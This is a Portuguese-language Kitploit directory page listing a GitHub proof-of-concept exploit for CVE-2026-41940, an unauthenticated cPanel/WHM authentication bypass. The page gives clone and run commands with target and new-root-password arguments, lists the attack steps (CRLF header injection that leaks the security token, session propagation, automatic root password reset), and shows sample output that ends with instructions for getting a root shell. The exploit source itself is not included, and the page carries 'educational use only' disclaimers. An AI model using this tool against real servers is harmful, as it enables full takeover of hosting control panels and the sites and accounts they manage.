Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-41940 — Prova de conceito de exploit para CVE-2026-41940, uma bypass de autenticação não autenticada no cPanel/WHM usando injeção CRLF para vazar tokens de segurança e redefinir a senha do root. | Kitploit
Ferramentas/GitHubGitHub/rosemary1337/cve-2026-41940
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubrosemary1337/cve-2026-41940

CVE-2026-41940

Prova de conceito de exploit para CVE-2026-41940, uma bypass de autenticação não autenticada no cPanel/WHM usando injeção CRLF para vazar tokens de segurança e redefinir a senha do root.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-41940 Exploração Automática

Python Status Author


Visão Geral

CVE-2026-41940 é uma prova de conceito (PoC) de exploração direcionada ao cPanel/WHM.
Esta exploração demonstra um desvio de autenticação não autenticado usando injeção CRLF para vazar tokens de segurança e obter acesso de nível root à interface WHM, permitindo ações como alterar a senha do root.

Aviso: Esta PoC é apenas para fins educacionais. Não use em sistemas sem permissão.


Recursos

  • Descoberta automática de hostname: Identifica automaticamente o hostname canônico para contornar as restrições do cabeçalho Host.
  • Criação de sessão pré-autenticação: Gera uma sessão inicial válida para injeção.
  • Injeção CRLF: Aproveita a injeção em cabeçalhos para vazar o cp_security_token.
  • Propagação de sessão: Força o token vazado para o cache de autenticação do servidor.
  • Redefinição da senha do root: Altera automaticamente a senha do root do WHM após o desvio bem-sucedido.
  • Dependências mínimas: Funciona com a biblioteca padrão requests.

Instalação

  1. Clone o repositório:
root@kitploit:~
git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
  1. Instale as dependências:
root@kitploit:~
pip install requests

Requisitos: requests, urllib3


Uso

root@kitploit:~
python3 CVE_2026_41940.py --target <URL_ALVO> --password <NOVA_SENHA>

Exemplo:

root@kitploit:~
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!

Argumentos


Saída

O console mostra:

  • Mensagens de status [0-4]
  • Sucesso [+]
  • Falha [!]
  • Informação [*]

Exemplo:

root@kitploit:~
[0] hostname = target.local
[1] minting a preauth session...
    session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.12"}
[*] changing the root password
    passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell

Segurança e Aviso

  • Apenas para fins educacionais e de teste.
  • Não ataque sites sem permissão explícita.
  • Use apenas em laboratório controlado ou teste de penetração autorizado.
Baixar ferramenta
FlagDescriçãoObrigatórioPadrão
--targetURL alvo do WHM (ex.: https://host:2087)Sim-
--passwordNova senha para o usuário rootSim-
--hostnameSubstituir cabeçalho Host:NãoAuto